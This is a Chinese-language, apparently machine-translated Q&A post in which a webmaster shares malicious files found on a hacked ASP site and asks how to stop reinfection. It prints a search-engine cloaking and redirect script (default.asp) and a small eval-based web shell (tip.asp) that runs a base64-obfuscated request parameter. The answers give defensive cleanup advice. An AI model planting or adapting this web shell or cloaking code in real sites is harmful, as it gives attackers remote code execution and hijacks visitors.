我是一个网站的网站管理员,几天前,我意识到该网站遭到黑客入侵,因为当我使用site:运营商搜索时,它会重定向到另一个网站(已编辑),我已经从未见过。
我已经完成了一些故障排除步骤,我在网站文件中发现了一些恶意文件。第一个是带有以下代码的“default.asp”:
<%
On Error Resume Next
Function getAgent()
Dim a,b,spider_array,i
a=LCase(Request.ServerVariables("HTTP_USER_AGENT"))
b=LCase(Request.ServerVariables("HTTP_FROM"))
spider_array=array("google","yahoo","bing")
getAgent=False
For i=0 To ubound(spider_array)
If Instr(a,spider_array(i))>0 And Instr(b,spider_array(i))>0 Then
getAgent=True
Next
End Function
Function getReferrer()
Dim page_from,search_array,i
page_from=LCase(Request.ServerVariables("HTTP_REFERER"))
search_array=array("google","yahoo","bing")
getReferrer=False
For i=0 To Ubound(search_array)
If Instr(page_from,search_array(i))>0 Then getReferrer=True
Next
End Function
If getReferrer Then
Response.Redirect("redacted site url")
Response.End
End If
If getAgent Then
%>
<!--#include virtual="/images/mirr.jpg"-->
<%
Response.End
End If
%>
<!--#include virtual="/index.html"-->
第二张是一张名为“mirr.jpg”的照片,我从未上传到主机上的网站文件。
第三个,另一个tip.asp:
<script runat="server" language="JScript">
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
<%
popup(popup(System.Text.Encoding.Default.GetString(
System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJzeW15aGsiXQ=="))));
%>
因此,为了清理网站,最好的解决方案是从托管中删除这三个文件或上传一份干净的网站副本,对吧?但有一点,我昨天更改了FTP密码,然后我上传了一个干净的备份版本的网站,但今天我又在网站上找到了这三个文件......
我还更改了目录的CHMOD权限,因此无法创建新文件,但由于这些文件今天再次显示,因此无效。
你能帮助我解决这个问题吗?您建议如何解决该恶意软件的行为?
答案 0 :(得分:0)
这更像是一个系统管理员问题然后编程。可能发生的事情是一个脚本被称为服务器上的其他地方,查看最近添加的任何内容并具有执行权限。不知道你是否有Windows或Linux机箱,但在大多数情况下最好只是转储服务器并重新安装所选操作系统
答案 1 :(得分:0)
你有一个蠕虫,并且有另一个 backdoor你没找到,哪个用于重新感染网站,或者你有其他一些易受攻击的代码。
某人专门为您设计蠕虫的可能性不大;您可能正在使用某个ASP网站(例如FooAspSite)或主题,其漏洞已众所周知,已为其开发了自动感染器。
检查软件站点以获取新版本的FooAspSite或安全修复程序。
您提到的网站是一家意大利电子商店,看起来它可能已经被黑客攻击,现在已经被清理过了,正如您已经观察过的那样(重定向的文件不再存在)。
类似于您的ASP的代码for PHP too,具有类似的机制。
在答案here中可以找到一些好的指针(&#34;我如何处理受感染的服务器&#34;)。
确定&#34;他们&#34;回过头来,您可以尝试在恶意文件的创建时间周围检查网站的访问日志,可能。请记住,这个时间可能是伪造的。几乎可以肯定,攻击者在重新安装后试图访问一个或多个恶意文件;如果您发现对这些文件的访问,那些紧接在那些文件之前的访问,可能来自相同的IP地址,可能不是,可能是导致妥协的访问。您可能会注意到对很少使用的插件的访问,或日志中的奇怪字符,或异常响应长度或HTTP代码。